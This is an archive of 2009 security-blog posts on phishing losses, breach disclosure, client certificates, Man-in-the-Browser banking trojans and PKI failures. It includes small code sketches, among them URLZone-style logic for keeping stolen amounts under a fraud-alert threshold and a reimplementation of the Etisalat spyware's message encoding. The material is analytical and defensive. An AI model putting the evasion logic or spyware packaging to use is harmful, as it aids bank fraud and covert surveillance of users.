    • 0.5% of customers fall for phishing schemes and compromise their online banking information.
    • The monetary losses could range between $2.4 million and $9.4 million annually per one million online banking clients.
    • On average ... approximately 832 a year ... reached users' inboxes.
    • Costs estimated at up to $9.4 million per year per million users.
    • Based on data collected from "3 million e-banking users who are customers of 10 sizeable U.S. and European banks."

    The primary source was a survey run by an anti-phishing software vendor, so caveats apply. Still interesting!
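
    Taking the vendor's figures at face value, the arithmetic at least hangs together (Python; numbers from the list above):

        customers = 1_000_000
        fall_rate = 0.005               # 0.5% compromise their credentials

        victims = customers * fall_rate
        print(f"victims per million customers: {victims:,.0f}")

        for total_loss in (2.4e6, 9.4e6):
            print(f"implied loss per victim: ${total_loss / victims:,.0f}")

        # 5,000 victims; $480 to $1,880 each. Plausible for drained retail
        # accounts, so the top-line millions are internally consistent.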

    For more meat on the bigger picture, see this article: Ending the PCI Blame Game. Which reads like a compressed version of this blog! Perhaps, finally, the thing that is staring the financial operators in the face has started to hit home, and they are really ready to sound the alarm.

    Posted by iang at 06:35 PM | Comments (1) | TrackBack

    November 26, 2009

    Breaches not as disclosed as much as we had hoped

    One of the brief positive spots of the last decade was the California bill that required breaches of data to be disclosed to affected customers. It took a while, but in 2005 the flood gates opened. Now reports the FBI:

    "Of the thousands of cases that we've investigated, the public knows about a handful," said Shawn Henry, assistant director for the Federal Bureau of Investigation's Cyber Division. "There are million-dollar cases that nobody knows about."

    That seems to point at a super-iceberg. To some extent this is expected, because companies will search out new methods to bypass the intent of the disclosure laws. And also there is the underlying economics. As has been pointed out by many (or perhaps not many, but at least me), the reputation damage probably dwarfs the actual or measurable direct losses to the company and its customers.

    Companies that are victims of cybercrime are reluctant to come forward out of fear the publicity will hurt their reputations, scare away customers and hurt profits. Sometimes they don't report the crimes to the FBI at all. In other cases they wait so long that it is tough to track down evidence.

    So, avoidance of disclosure is the strategy for all properly managed companies, because they are required to manage the assets of their shareholders to the best interests of the shareholders. If you want a more dedicated treatment leading to this conclusion, have a look at "the market for silver bullets" paper.

    Meanwhile, the FBI reports that the big companies have improved their security somewhat, so the attackers have turned to smaller companies. And:

    They also target corporate executives and other wealthy public figures who it is relatively easy to pursue using public records. The FBI pursues such cases, though they are rarely made public.

    Huh. And this outstanding coordinated attack:

    A similar approach was used in a scheme that defrauded the Royal Bank of Scotland's (RBS.L: Quote, Profile, Research, Stock Buzz) RBS WorldPay of more than $9 million. A group, which included people from Estonia, Russia and Moldova, has been indicted for compromising the data encryption used by RBS WorldPay, one of the leading payment processing businesses globally.

    The ring was accused of hacking data for payroll debit cards, which enable employees to withdraw their salaries from automated teller machines. More than $9 million was withdrawn in less than 12 hours from more than 2,100 ATMs around the world, the Justice Department has said.

    2,100 ATMs! Worldwide! That leaves that USA gang looking somewhat kindergarten, with only 50 ATMs. No doubt about it, we're now talking serious networked crime, and I'm not referring to the Internet but to the network of collaborating, economic agents.

    Compromising the data encryption, even. Anyone know the specs? These are important numbers. Did I miss this story, or does it prove the FBI's point?

    Posted by iang at 01:23 PM | Comments (0) | TrackBack

    October 19, 2009

    Denial of Service is the greatest bug of most security systems

    I've had a rather troubling rash of blog comment failures recently. Not on FC, which seems to be OK ("to me"), but everywhere else. At about four failures in the last couple of days, I'm starting to get annoyed. I like to think that my time writing blog comments for other blogs is valuable, and sometimes I think for many minutes about the best way to bring a point home.

    But more than half the time, my comment is rejected. The problem is, on the one hand, overly sophisticated comment boxes that rely on exotica like javascript and SSO through some place or other ... and, on the other hand, spam.

    These things have destroyed the credibility of the blog world. If you recall, there was a time when people used blogs for _conversations_. Now, most blogs are self-serving promotion tools. Trackbacks are dead, so the conversational reward is gone, and comments are slow. You have to be dedicated to want to follow a blog and put a comment on there, or stupid enough to think your comment matters, and you'll keep fighting the bl**dy javascript box.

    The one case where I know clearly "it's not just me" is John Robb's blog. This was a *fantastic* blog where there was great conversation, until a year or two back. It went from dozens to a couple in one hit by turning on whatever flavour of the month was available in the blog system. I've not been able to comment there since, and I'm not alone.

    This is denial of service. To all of us. And this denial of service is the greatest evidence of the failure of Internet security. Yet it is easy, theoretically easy, to avoid. Here, it is avoided by the simplest of tricks; maybe one spam per month comes my way, but if I got spam like others get spam, I'd stop doing the blog. Again, denial of service.

    Over on CAcert.org's blog they recently implemented client certs. I'm not 100% convinced that this will eliminate comment spam, but I'm 99.9% convinced. And it is easy to use, and it also (more or less) eliminates that terrible thing called access control, which was delivering another denial of service: the people who could write weren't trusted to write, because the access control system said they had to be access-controlled. Gone, all gone.

    According to the blog post on it:

    The CAcert-Blog is now fully X509 enabled. From never visited the site before and using a named certificate you can, with one click (log in), register for the site and have author status ready to write your own contribution.

    Sounds like a good idea, right? So why don't most people do this? Because they can't. Mostly they can't because they do not have a client certificate. And if they don't have one, there isn't any point in the site owner asking for it. Chicken & egg?

    But actually there is another reason why people don't have a client certificate: it is because of all sorts of mumbo jumbo brought up by the SSL / PKIX people, chief amongst which is a claim that we need to know who you are before we can entrust you with a client certificate ... which I will now show to be a fallacy. The reason client certificates work is this:

    If you only have a WoT unnamed certificate you can write your article and it will be spam controlled by the PR people (aka editors).

    If you had a contributor account and haven’t posted anything yet you have been downgraded to a subscriber (no comment or write a post access) with all the other spammers. The good news is once you log in with a certificate you get upgraded to the correct status just as if you’d registered.

    We don't actually need to know who you are. We only need to know that you are not a spammer, and that you are going to write a good article for us. Both of these are more or less equivalent, if you think about it; they are a logical parallel to the CAPTCHA or Turing test. And we can prove this easily and economically and efficiently: write an article, and you're in.

    Or, in certificate terms, we don't need to know who you are, we only need to know you are the same person as last time, when you were good.

    This works. It is an undeniable benefit:

    There is no password authentication any more. The time taken to make sure both behaved reliably was not possible in the time the admins had available.

    That's two more pluses right there: no admin de-spamming time lost to us and general society (when there were about 290 in the wordpress click-delete queue) and we get rid of those bl**dy passwords, so another denial of service killed.

    Why isn't this more available? The problem comes down to an inherent belief that the above doesn't work. Which is of course complete nonsense. Two weeks later, zero comment spam, and I know this will carry on being reliable because the time taken to get a zero-name client certificate (free, it's just your time involved!) is well in excess of the trick required to comment on this blog.

    No matter the *results*, because of the belief that "last-time-good-time" tests are not valuable, the feature of using client certs is not effectively available in the browser. That which I speak of here is so simple to code up it can actually be tricked from any website to happen (which is how CAs get it into your browser in the first place, some simple code that causes your browser to do it all). It is basically the creation of a certificate key pair within the browser, with a no-name in it. Commonly called the self-signed certificate or SSC, these things can be put into the browser in about 5 seconds, automatically, on startup or on absence or whenever. If you recall that aphorism:

    There is only one mode, and it is secure.

    And contrast it to SSL, where we can see what went wrong: there is an *option* of using a client cert, which is a completely insane choice. The choice of making the client certificate optional within SSL was a decision not only to allow insecurity in the mode, but also to promote insecurity, by practically eliminating the use of client certs (see the chicken & egg problem).
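
    For the doubters, minting the no-name SSC really is a dozen lines. A sketch using the third-party Python "cryptography" package (the "anonymous" common name is arbitrary, since no identity is being claimed):

        import datetime
        from cryptography import x509
        from cryptography.x509.oid import NameOID
        from cryptography.hazmat.primitives import hashes, serialization
        from cryptography.hazmat.primitives.asymmetric import rsa

        key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "anonymous")])
        cert = (
            x509.CertificateBuilder()
            .subject_name(name)
            .issuer_name(name)      # self-signed: issuer == subject
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(datetime.datetime.utcnow())
            .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
            .sign(key, hashes.SHA256())
        )
        print(cert.public_bytes(serialization.Encoding.PEM).decode())

    The browser could do exactly this, silently, on startup; all it certifies is continuity, the same key as last time.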

    And this is where SSL and the PKIX deliver their greatest harm. It denies simple cryptographic security to a wide audience, in order to deliver ... something else, which it turns out isn't as secure as hoped, because everyone selects the wrong option. The denial of service attack is dominating; it's at the level of 99% and beyond: how many blogs do you know that have trouble with comments? How many use SSL at all?

    So next time someone asks you, why these effing passwords are causing so much grief in your support department, ask them why they haven't implemented client certs? Or, why the spam problem is draining your life and destroying your social network? Client certs solve that problem.

    SSL security is like Bismarck's sausages: "making laws is like making sausages, you don't want to watch them being made." The difference is, at least Bismarck got a sausage!

    Footnote: you're probably going to argue that SSCs will be adopted by the spammers' brigade once there is widespread use of this trick. Think for a minute before you post that comment; the answer is right there in front of your nose! Also, you are probably going to mention all these other limitations of the solution. Think for another minute and consider this claim: almost all of the real limitations exist because the solution isn't much used. Again, chicken & egg; see "usage". Or maybe you'll argue that we don't need it now that we have OpenID. That's specious, because we don't actually have OpenID as yet (some few do, not all), and also, the presence of one technology rarely argues against the need for another; only marketing argues like that.

    Posted by iang at 10:47 AM | Comments (6) | TrackBack

    October 01, 2009

    Man-in-the-Browser goes to court

    Stephen Mason reports that MITB is in court:

    A gang of internet fraudsters used a sophisticated virus to con members of the public into parting with their banking details and stealing £600,000, a court heard today.

    Once the 'malicious software' had infected their computers, it waited until users logged on to their accounts, checked there was enough money in them and then insinuated itself into cash transfer procedures.

    (also on El Reg.) This breaches the 2-factor authentication system commonly in use because (a) the trojan controls the user's PC, and (b) the authentication scheme that was commonly pushed out over the last decade or so only authenticates the user, not the transaction. So, as the trojan now controls the PC, it is the user. And the real user happily authenticates itself, and the trojan, and the trojan's transactions, and even lies about it!

    Numbers, more than ordinarily reliable because they have been heard in court:

    'In fact as a result of this Trojan virus fraud very many people - 138 customers - were affected in this way with some £600,000 being fraudulently transferred.

    'Some of that money, £140,000, was recouped by NatWest after they became aware of this scam.'

    This is called Man-in-the-Browser, which is a subtle reference to SSL's vaunted protection against the Man-in-the-Middle. Unfortunately, several things went wrong in this area of security: Adi's 3rd law of security says the attacker always bypasses; one of my unnumbered aphorisms has it that the node is always the threat, never the wire; and finally, the extraordinary success of SSL in the mindspace war blocked any attempts to fix the essential problems. SSL is so secure that nobody dares challenge browser security.

    The MITB was first reported in March 2006 and sent a wave of fear through the leading European banks. If customers lost trust in online banking, this would turn their support / branch employment numbers on their heads. So they rapidly (for banks) developed a counter-attack by moving their confirmation process over to the SMS channel of users' phones. The Man-in-the-Browser cannot leap across that air-gap, and the MITB is more or less defeated.
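
    The trick is that the confirmation is bound to the transaction, not merely to the session. A sketch of the idea (Python; the key, fields and code length are all illustrative):

        import hmac, hashlib

        def confirmation_code(key: bytes, account: str, payee: str, amount: str) -> str:
            """Code the bank texts to the customer: altering payee or
            amount in the browser invalidates it."""
            msg = f"{account}|{payee}|{amount}".encode()
            return hmac.new(key, msg, hashlib.sha256).hexdigest()[:6]

        key = b"per-customer secret held by the bank"
        print(confirmation_code(key, "12345678", "ACME Ltd", "99.50"))

        # The SMS reads: "Pay ACME Ltd GBP 99.50? Code: <code>". The user
        # checks payee and amount on the phone, across the air-gap, before
        # typing the code back into the possibly-infected browser.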

    European banks tend to be proactive when it comes to security, and hence their losses are minuscule. Reported recently was something like €400k for a smaller country (7 million people?) for an entire year, for all banks. This one case in the UK is double that, reflecting that British banks and USA banks are reactive on security. Although they knew about it, they ignored it.

    This could be called the "prove-it" school of security, and it has merit. As we saw with SSL, there never really was much of a threat on the wire; and when it came to the node, we were pretty much defenceless (although a lot of that comes down to one factor: Microsoft Windows). So when faced with FUD from the crypto / security industry, it is very, very hard to separate real dangers from made-up ones. I felt it was serious; others thought I was spreading FUD! Hence Philipp Gühring's paper _Concepts against Man-in-the-Browser Attacks_, and the episode formed fascinating evidence for the market for silver bullets. The concept has now been proven right in practice, but it didn't turn out how we predicted.

    What is also interesting is that we now have a good cycle timeline: March 2006 is when the threat first crossed our radars. September 2009 it is in the British courts.

    Postscript. More numbers from today's MITB:

    A next-generation Trojan recently discovered pilfering online bank accounts around the world kicks it up a notch by avoiding any behavior that would trigger a fraud alert and forging the victim's bank statement to cover its tracks.

    The so-called URLZone Trojan doesn't just dupe users into giving up their online banking credentials like most banking Trojans do: Instead, it calls back to its command and control server for specific instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send it the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction.

    Researchers from Finjan found the sophisticated attack, in which the cybercriminals stole around 200,000 euro per day during a period of 22 days in August from several online European bank customers, many of whom were based in Germany....

    "The Trojan was smart enough to be able to look at the [victim's] bank balance," says Yuval Ben-Itzhak, CTO of Finjan... Finjan found the attackers had lured about 90,000 potential victims to their sites, and successfully infected about 6,400 of them. ...URLZone ensures the transactions are subtle: "The balance must be positive, and they set a minimum and maximum amount" based on the victim's balance, Ben-Itzhak says. That ensures the bank's anti-fraud system doesn't trigger an alert, he says.

    And the malware is making the decisions -- and alterations to the bank statement -- in real time, he says. In one case, the attackers stole 8,576 euro, but the Trojan forged a screen that showed the transferred amount as 53.94 euro. The only way the victim would discover the discrepancy is if he logged into his account from an uninfected machine.
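
    The lesson for the defender is that any fixed alert threshold simply becomes a parameter in the attacker's config. In sketch form (Python; the threshold and band are invented for illustration):

        import random

        ALERT_THRESHOLD = 10_000        # the bank alerts on transfers >= this

        def naive_alert(amount):
            return amount >= ALERT_THRESHOLD

        def urlzone_style_amount(balance, lo=500, hi=9_000):
            # per Finjan's description: keep the balance positive and the
            # amount inside a configured band, so the alert never fires
            return round(random.uniform(lo, min(hi, balance * 0.3)), 2)

        amount = urlzone_style_amount(balance=28_000)
        assert not naive_alert(amount)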

    Posted by iang at 09:26 AM | Comments (1) | TrackBack

    September 14, 2009

    OSS on how to run a business

    After a rather disastrous meeting a few days ago, I finally found the time to load up:

    OSS's Simple Sabotage Field Manual

    The Office of Strategic Services was the USA's dirty-tricks brigade of WWII, and later became the CIA. Their field manual was declassified and published, and, lo and behold, it includes some mighty fine advice. The manual was brought to the world's attention by the fellow who presented the story of the CIA's "open intel" wiki; he thought it relevant, I guess.

    Sections 11 and 12 are the most important to us; the rest concentrates on the physical end of the spectrum, blowing stuff up. Onwards:

    (11) General Interference with Organizations and Production


    (a) Organizations and Conferences

    (1) Insist on doing everything through "channels." Never permit short-cuts to be taken in order to expedite decisions.

    (2) Make "speeches." Talk as frequently as possible and at great length. Illustrate your "points" by long anecdotes and accounts of personal experiences. Never hesitate to make a few appropriate "patriotic" comments.

    (3) When possible, refer all matters to committees, for "further study and consideration." Attempt to make the committees as large as possible - never less than five.

    (4) Bring up irrelevant issues as frequently as possible.

    (5) Haggle over precise wordings of communications, minutes, resolutions.

    (6) Refer back to matters decided upon at the last meeting and attempt to reopen the question of the advisability of that decision.

    (7) Advocate "caution." Be "reasonable" and urge your fellow-conferees to be "reasonable" and avoid haste which might result in embarrassments or difficulties later on.


    (8) Be worried about the propriety of any decision - raise the question of whether such action as is contemplated lies within the jurisdiction of the group or whether it might conflict with the policy of some higher echelon.


    Read the full sections 11 and 12, and for reference, also the entire manual. As some have suggested, it reads like a modern management manual, perhaps proving that people don't change over time!

    Posted by iang at 09:42 PM | Comments (1) | TrackBack

    September 02, 2009

    Robert Garigue and Charlemagne as a model of infosec

    Gunnar reports that someone called Robert Garigue died last month. This person I knew not, but his model resonates. Sound bites only from Gunnar's post:

    "It's the End of the CISO As We Know It (And I Feel Fine)"...

    ...First, they miss the opportunity to look at security as a business enabler. Dr. Garigue pointed out that because cars have brakes, we can drive faster. Security as a business enabler should absolutely be the starting point for enterprise information security programs.
    ...

    Secondly, if your security model reflects some CYA abstraction of reality instead of reality itself your security model is flawed. I explored this endemic myopia...

    This rhymes with: "what's your business model?" The bit lacking from most orientations is the enabler: why are we here in the first place? It's not to show the most elegant protocol for achieving C-I-A (confidentiality, integrity, authenticity), but to promote the business.

    How do we do that? Well, most technologists don't understand the business, let alone speak its language. And the business folks can't speak the techno-crypto blah blah either, so the blame is fairly shared. Dr. Garigue points us to Charlemagne as a better model:

    King of the Franks and Holy Roman Emperor; conqueror of the Lombards and Saxons (742-814) - reunited much of Europe after the Dark Ages.

    He set up other schools, opening them to peasant boys as well as nobles. Charlemagne never stopped studying. He brought an English monk, Alcuin, and other scholars to his court - encouraging the development of a standard script.

    He set up money standards to encourage commerce, tried to build a Rhine-Danube canal, and urged better farming methods. He especially worked to spread education and Christianity in every class of people.

    He relied on Counts, Margraves and Missi Domini to help him.

    Margraves - Guard the frontier districts of the empire. Margraves retained, within their own jurisdictions, the authority of dukes in the feudal arm of the empire.

    Missi Domini - Messengers of the King.

    In other words, the role of the security person is to enable others to learn, not to do, nor to critique, nor to design. In more specific terms, the goal is to bring the team to a better standard, and a better mix of security and business. Garigue's mandate for IT security?

    Knowledge of risky things is of strategic value

    How to know today tomorrow's unknown?

    How to structure information security processes in an organization so as to identify and address the NEXT categories of risks?

    Curious, isn't it! But if we think about how reactive most security thinking is these days, one has to wonder how we would ever get the chance to fight tomorrow's war today.

    Posted by iang at 10:45 PM | Comments (1) | TrackBack

    July 15, 2009

    trouble in PKI land

    The CA and PKI business is busy this week. CAcert, a community Certification Authority, has a special general meeting to resolve the trauma of the collapse of their audit process. Depending on who you ask, my resignation as auditor was either the symptom or the cause.

    In my opinion, the process wasn't working, so now I'm switching to the other side of the tracks. I'll work to get the audit done from the inside. Whether it will be faster or easier this way is difficult to say; we only get to run the experiment once.

    Meanwhile, Mike Zusman and Alex Sotirov are claiming to have breached the EV green-bar thing used by some higher-end websites. No details available yet; it's the normal tease before a BlabHat-style presentation by academics. Rumour has it that they've exploited weaknesses in the browsers. Some details emerging:

    With control of the DNS for the access point, the attackers can establish their machines as men-in-the-middle, monitoring what victims logged into the access point are up to. They can let victims connect to EV SSL sites - turning the address bars green. Subsequently, they can redirect the connection to a DV SSL session under a certificate they have gotten illicitly, but the browser will still show the green bar.

    Ah that old chestnut: if you slice your site down the middle and do security on the left and no or lesser security on the right, guess where the attacker comes in? Not the left or the right, but up the middle, between the two. He exploits the gap. Which is why elsewhere, we say "there is only one mode and it is secure."

    Aside from that, this is an interesting data point. It might be considered that this is proof that the process is working (following the GP theory), or it might be proof that the process is broken (following the sleeping-dogs-lie model of security).

    Although EV represents good documentation of what the USA/Canada region (not Europe) would subscribe to as "best practices," it fails in some disappointing ways. And in some ways it has made matters worse. Here's one: because the closed, proprietary CA/B Forum group didn't really agree to fix the real problems, those real problems are still there. As Extended Validation has held itself up as a sort of gold standard, attackers now have something fun to focus on. We all knew that SSL was sort of facade-ware in the real security game, and didn't bother to mention it. But now that the bigger CAs have bought into the marketing campaign, they'll get a steady stream of attention from academics and press.

    I would guess less so from real attackers, because there are easier pickings elsewhere, but maybe I'm wrong:

    "From May to June 2009 the total number of fraudulent website URLs using VeriSign SSL certificates represented 26% of all SSL certificate attacks, while the previous six months presented only a single occurrence," Raza wrote on the Symantec Security blogs.

    ... MarkMonitor found more than 7,300 domains exploited four top U.S. and international bank brands with 16% of them registered since September 2008.
    .... But in the latest spate of phishing attempts, the SSL certificates were legitimate because "they matched the URL of the fake pages that were mimicking the target brands," Raza wrote.

    VeriSign Inc., which sells SSL certificates, points out that SSL certificate fraud currently represents a tiny percentage of overall phishing attacks. Only two domains, and two VeriSign certificates were compromised in the attacks identified by Symantec, which targeted seven different brands.

    "This activity falls well within the normal variability you would see on a very infrequent occurrence," said Tim Callan, a product marketing executive for VeriSign's SSL business unit. "If these were the results of a coin flip, with heads yielding 1 and tails yielding 0, we wouldn't be surprised to see this sequence at all, and certainly wouldn't conclude that there's any upward trend towards heads coming up on the coin."

    Well, we hope that nobody's head is flipped in an unsurprising fashion....

    It remains to be seen whether this makes any difference. I must admit, I check the green bar on my browser when online banking, but annoyingly it makes me click to see who signed the certificate. For real users, Firefox says that it is the website, which is wrong and annoying, but Mozilla has not shown itself adept at understanding the legal and business side of security. I've heard Safari has been fixed up, so it's probably time to try that again and report sometime.

    Then, over to Germany, where a snafu with an HSM ("hardware security module") caused a root key to be lost (also in German). Over on the crypto lists, there are PKI opponents pointing out how this means PKI doesn't work, and there are PKI proponents pointing out how they should have employed better consultants. Both sides are right, of course, so what to conclude?

    Test runs with Germany's first-generation electronic health cards and doctors' "health professional cards" have suffered a serious setback. After the failure of a hardware security module (HSM) holding the private keys for the root Certificate Authority (root CA) for the first-generation cards, it emerged that the data had not been backed up. Consequently, if additional new cards are required for field testing, all of the cards previously produced for the tests will have to be replaced, because a new root CA will have to be generated. ... Besides its use in authentication, the root CA is also important for card withdrawal (the revocation service).

    The first thing to realise was that this was a test rollout and not the real thing. So the test discovered a major weakness; in that sense it is successful, albeit highly embarrassing because it reached the press.

    The second thing is the HSM issue. As we know, PKI is constructed as a hierarchy, or a tree. At the root of the tree is the root key of course. If this breaks, everything else collapses.

    Hence there is a terrible fear of the root breaking. This feeds into the wishes of suppliers of high security modules, who make hardware that protect the root from being stolen. But, in this case, the HSM broke, and there was no backup. So a protection for one fear -- theft -- resulted in a vulnerability to another fear -- data loss.

    A moment's thought and we realise that the HSM has to have a backup. Which has to be at least as good as the HSM. Which means we then have some rather cute conundrums, based on the Alice in Wonderland concept of having one single root except we need multiple single roots... In practice, how do we create the root inside the HSM (for security protection) and get it to another HSM (for recovery protection)?
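
    In software terms, the conundrum looks something like the sketch below, using Python's cryptography package as a stand-in; a real HSM would wrap the key in hardware, and the passphrase here is a placeholder for a secret that would be split among several custodians.

        from cryptography.hazmat.primitives.asymmetric import rsa
        from cryptography.hazmat.primitives import serialization

        # Generate the root key (inside the HSM, in a real deployment).
        root_key = rsa.generate_private_key(public_exponent=65537, key_size=4096)

        # The escrow copy must be protected as well as the HSM itself:
        # encrypted under a passphrase never held by any one person.
        escrow_blob = root_key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.BestAvailableEncryption(
                b"placeholder-split-among-custodians"),
        )
        # Store escrow_blob offline in a second vault: two "single" roots.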

    Serious engineers and architects will be reaching for one word: BRITTLE! And so it is. Yes, it is possible to do this, but only by breaking the hierarchical principle of PKI itself. It is hard to break fundamental principles, and the result is that PKI will always be brittle, the implementations will always have contradictions that are swept under the carpet by the managers, auditors and salesmen. The PKI design is simply not real world engineering, and the only thing that keeps it going is the institutional deadly embrace of governments, standards committees, developers and security companies.

    Not the market demand. But, not all has been bad in the PKI world. Actually, since the bottoming out of the dotcom collapse, cert uptake has been rising, and market demand is present, albeit nothing beyond compliance-driven. Here comes a minor item of success:

    VeriSign, Inc. [SNIP] today reported it has topped the 1 billion mark for daily Online Certificate Status Protocol (OCSP) checks.

    [SNIP] A key link in the online security chain, OCSP offers the most timely and efficient way for Web browsers to determine whether a Secure Sockets Layer (SSL) or user certificate is still valid or has been revoked. Generally, when a browser initiates an SSL session, OCSP servers receive a query to check to see if the certificate in use is valid. Likewise, when a user initiates actions such as smartcard logon, VPN access or Web authentication, OCSP servers check the validity of the user certificate that is presented. OCSP servers are operated by Certificate Authorities, and VeriSign is the world's leading Certificate Authority.

    [SNIP] VeriSign is the EV SSL Certificate provider of choice for more than 10,000 Internet domain names, representing 74 percent of the entire EV SSL Certificate market worldwide.

    (In the above, I've snipped the self-serving marketing and one blatant misrepresentation.)

    Certificates are static statements. They can be revoked, but the old design of downloading complete lists of all revocations was not really workable (some CAs ship megabyte-sized lists). We now have a newer mechanism whereby, if you are in possession of a certificate, you can do an online check of its status: OCSP.
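
    For the curious, the check itself is small. A minimal sketch, assuming Python's cryptography and requests packages; the file names and responder URL are placeholders (in practice the URL comes from the certificate's AIA extension).

        import requests
        from cryptography import x509
        from cryptography.hazmat.primitives import hashes, serialization
        from cryptography.x509 import ocsp

        cert = x509.load_pem_x509_certificate(open("site.pem", "rb").read())
        issuer = x509.load_pem_x509_certificate(open("issuer.pem", "rb").read())

        # Build a DER-encoded OCSP request for this one certificate.
        req = (ocsp.OCSPRequestBuilder()
               .add_certificate(cert, issuer, hashes.SHA1())
               .build()
               .public_bytes(serialization.Encoding.DER))

        resp = requests.post("http://ocsp.example-ca.com", data=req,
                             headers={"Content-Type": "application/ocsp-request"})
        print(ocsp.load_der_ocsp_response(resp.content).certificate_status)
        # -> OCSPCertStatus.GOOD / REVOKED / UNKNOWN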

    The fundamental problem with this, and the reason why it took the industry so long to get around to making revocation a real-time thing, is that once you have that architecture in place, you no longer need certificates. If you know the website, you simply go to a trusted provider and get the public key. The problem with this approach is that it doesn't allow the CA business to sell certificates to web site owners. As it lacks any business model for CAs, the CAs will fight it tooth & nail.

    Just another conundrum from the office of security Kafkaism.

    Here's another one, this time from the world of code signing. The idea is that updates and plugins can be sent to you with a digital signature. This means, variously, that the code is good and won't hurt you, or that someone knows who the author is, so there is someone to hold accountable if it does. Whatever it means, developers put great store in the apparent ability of the digital signature to protect them from something or other.
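
    What the signature actually establishes is narrow, as a bare-bones check makes clear. A sketch assuming Python's cryptography package, an RSA vendor key, and placeholder file names:

        from cryptography.hazmat.primitives import hashes, serialization
        from cryptography.hazmat.primitives.asymmetric import padding
        from cryptography.exceptions import InvalidSignature

        pub = serialization.load_pem_public_key(open("vendor_pub.pem", "rb").read())
        update = open("update.bin", "rb").read()
        sig = open("update.sig", "rb").read()

        try:
            pub.verify(sig, update, padding.PKCS1v15(), hashes.SHA256())
            # All we have learned: the holder of the vendor key signed
            # these bytes. Nothing about whether the code is benign.
            print("signature checks out")
        except InvalidSignature:
            print("reject update")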

    But it didn't work out for BlackBerry users. Allegedly, a Blackberry provider sent a signed code update to all users in the United Arab Emirates:

    Yesterday it was reported by various media outlets that a recent BlackBerry software update from Etisalat (a UAE-based carrier) contained spyware that would intercept emails and text messages and send copies to a central Etisalat server. We decided to take a look to find out more.

    ...
    Whenever a message is received on the device, the Recv class first inspects it to determine if it contains an embedded command - more on this later. If not, it UTF-8 encodes the message, GZIPs it, AES encrypts it using a static key ("EtisalatIsAProviderForBlackBerry"), and Base64 encodes the result. It then adds this bundle to a transmit queue. The main app polls this queue every five seconds using a Timer, and when there are items in the queue to transmit, it calls this function to forward the message to a hardcoded server via HTTP (see below). The call to http.sendData() simply constructs the POST request and sends it over the wire with the proper headers.
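
    (That packaging pipeline is easy to render in a few lines. The sketch below uses Python's cryptography package; the report does not specify a cipher mode, so AES in ECB mode with PKCS7 padding is assumed purely for illustration.)

        import base64, gzip
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        from cryptography.hazmat.primitives import padding

        STATIC_KEY = b"EtisalatIsAProviderForBlackBerry"   # 32 bytes = AES-256

        def package(message: str) -> bytes:
            # UTF-8 encode, GZIP, AES encrypt under the static key, Base64.
            compressed = gzip.compress(message.encode("utf-8"))
            padder = padding.PKCS7(algorithms.AES.block_size).padder()
            padded = padder.update(compressed) + padder.finalize()
            enc = Cipher(algorithms.AES(STATIC_KEY), modes.ECB()).encryptor()
            return base64.b64encode(enc.update(padded) + enc.finalize())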

    Oops! A signed spyware from the provider that copies all your private email and sends it to a server. Sounds simple, but there's a gotcha...

    The most alarming part about this whole situation is that people only noticed the malware because it was draining their batteries. The server receiving the initial registration packets (i.e. “Here I am, software is installed!”) got overloaded. Devices kept trying to connect every five seconds to empty the outbound message queue, thereby causing a battery drain. Some people were reporting on official BlackBerry forums that their batteries were being depleted from full charge in as little as half an hour.

    So, even though the spyware provider had a way to turn it on and off:

    It doesn’t seem to execute arbitrary commands, just packages up device information such as IMEI, IMSI, phone number, etc. and sends it back to the central server, the same way it does for received messages. It also provides a way to remotely enable/disable the spyware itself using the commands “start” and “stop”.

    There was something wrong with the design, and everyone's BlackBerry went mad. Two points: if you want to spy on your own customers, be careful, and test it. Get quality engineers onto that part, because you are perverting a brittle design, and that is tricky stuff.

    Second point. If you want to control a large portion of the population who hold these devices, the centralised hierarchy of PKI and its one-root-to-bind-them-all principle would seem to be perfectly designed for the job. Nobody can control it except the centre, which puts you in charge. In this case, the centre can use its powerful code-signing abilities to deliver whatever it wants you to trust. (You trust what it tells you to trust, of course.)

    Which has led some wits to label the CAs as centralised vulnerability partners. Which is odd, because some organisations that should know better than to outsource the keys to their security continue to do so.

    But who cares, as long as the work flows for the consultants, the committees, the HSM providers and the CAs?

    Posted by iang at 07:13 AM | Comments (7) | TrackBack

    March 12, 2009

    We don't fear no black swan!

    Over on EC, Adam does a presentation on his new book, co-authored with Andrew Stewart. AFAICS, the basic message in the book is "security sucks, we better start again." Right, no argument there.

    Curiously, he's also experimenting with Twitter in the presentations as a "silent" form of interaction (more). It is rather poignant to mix Twitter and security, but I generally like these experiments. The grey hairs don't understand this new stuff, and they have to find out somehow. Somehow and sometime; the only question is whether we are the dinosaurs or the mammals.

    Reading through the quotes (standard stuff) I came across this one, unattributed:

    I was pretty dismissive of "Black Swan" hype. I stand by that, and don't think we should allow fear of a black swan out there somewhere to prevent us from studying white ones and generalizing about what we can see.

    OK, we just saw the Black Swan over on the finance scene, where Wall Street is now turning into Rubble Alley. Why not on the net? Black swans are a name for those areas where our numbers are garbage and our formulas have an occasional tendency (say 1%) to blow up.

    Here's why there are no black swans on the net, for my money: there is no unified approach to security. Indeed, there isn't much of anything of security. There are tiny fights by tiny schools, but these are unadopted by the majority. Although there are a million certs out there, they play no real part in the security models of the users. A million OpenPGP keys are used for collecting signatures, not for securing data. Although there are hundreds of millions of lines of security code out there, now including fresh new Vista!, they are mostly ignored, bypassed, turned off, or subject to any other of the many Kerckhoffsian modes of failure.

    The vast majority of the net is insecure. We ain't got no security, we don't fear no black swan. We're about as low as we can get. If I look at the most successful security product of all time, Skype, it's showing around 10 million users right now. Facebook, Myspace, youtube, google, you name them, they *all* do an order of magnitude better than Skype's ugly duckling waddle.

    Why is the state of security so dire? Well, we could ask the DHS. Now, these guys are probably authoritative in at least a negative sense, because they actually were supposed to secure the USA government infrastructure. Here's what one guy says, thanks to Todd who passed this on:

    The official in charge of coordinating the U.S. government's cybersecurity operations has quit, saying the expanding control of the National Security Agency over the nation's computer security efforts poses "threats to our democratic processes."

    "Even from a security standpoint," Rod Beckstrom, the head of the Department of Homeland Security's National Cyber Security Center, told United Press International, "it is unwise to hand over the security of all government networks to a single organization."

